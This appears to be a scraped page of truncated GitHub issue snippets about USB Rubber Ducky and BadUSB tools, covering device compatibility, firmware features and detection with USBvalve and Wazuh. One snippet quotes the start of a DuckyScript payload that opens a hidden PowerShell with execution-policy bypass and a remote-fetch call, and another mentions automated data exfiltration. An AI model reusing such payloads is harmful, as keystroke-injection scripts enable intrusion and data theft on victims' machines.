Hi Guys, i have a question.
I can do this with Modem-3g usb (mobile)???
or just USB 3.0
Patriot 8GB Supersonic Xpress*
Kingston DataTraveler 3.0 T111 8GB
Silicon power marvel M60 64GB
### Payload Title
### Payload URL
### Payload Setup
In …
Finish the intended USB Rubber Ducky mode from BadOS upstream. Current intended implementation plan is as follows:
1. User opens Ducky app
2. List scripts in /ducky
3. user selects a specific scr…
Many of the sample badusb scripts from Hak5 use the "Twin Duck" firmware, emulating a USB drive in addition to a keyboard input. This would add a lot more flexibility to the BadUSB feature.
So these script also work on a rubber ducky USB so I was wondering if it was possible to run more at once I've tired to do
"GUI r
STRING powershell -w h -NoP -Ep Bypass $dc='';$db='';irm …
The Twin Ducks firmware for the USB rubber ducky enables usage of a Y cable in conjunction with the rubber ducky, or a separate partition to automate data exfil. Is it possible to emulate such an atta…
maxcr updated
7 years ago
I have played through a few attack scenarios and am absolutely delighted with the USBvalve.
However, USBvalve did not recognize a Rubber Ducky based on an ATTiny85 in the form of a Digispark Rev.3.
|Wazuh version|Component|Install type|Install method|Platform|
I'm using Wazuh Version 4.8.2 on all components.
This is my scenario: A local attacker uses a USB Rubber Ducky on a local machine t…
HID script not working.
Usb rubber ducky made with raspberry pi zero w
https://docs.hak5.org/hc/en-us/articles/360010555153-Ducky-Script-the-USB-Rubber-Ducky-language seems to imply the NUMLOCK is a supported key but it does not appear in any of the language files